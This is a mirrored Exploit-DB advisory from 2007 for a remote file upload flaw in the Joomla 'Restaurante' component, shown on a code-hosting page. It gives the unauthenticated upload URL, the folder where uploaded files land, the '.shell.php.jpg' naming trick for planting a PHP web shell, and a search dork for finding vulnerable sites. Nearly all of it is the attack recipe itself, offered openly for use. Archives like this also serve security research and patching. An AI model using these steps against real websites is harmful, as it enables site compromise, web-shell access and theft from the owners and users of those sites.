bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4383.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

38 lines
No EOL
937 B
Text
Raw Blame History

Joomla Component Restaurante <= Remote File Upload Vulnerability
found by : Cold z3ro
Homepage : www.hackteach.org , www.xp10.com
================================================================
@################################################################@
# joomla/index.php?option=com_restaurante&task=upload
#
# /joomla/components/com_restaurante/img_original/.shell.php.jpg
#
# Dork : /index.php?option=com_restaurante
@################################################################@
Attacker can upload any file using this link
joomla/index.php?option=com_restaurante&task=upload
after upload the file , He can find it in :
/components/com_restaurante/img_original
But the attacker should add ( Point ) befor filename
Example :
if attacker uploaded file named shell.php.jpg
its name will by like this .shell.php.jpg
in path :
/components/com_restaurante/img_original/.shell.php.jpg
# milw0rm.com [2007-09-08]
Reference in a new issue View git blame Copy permalink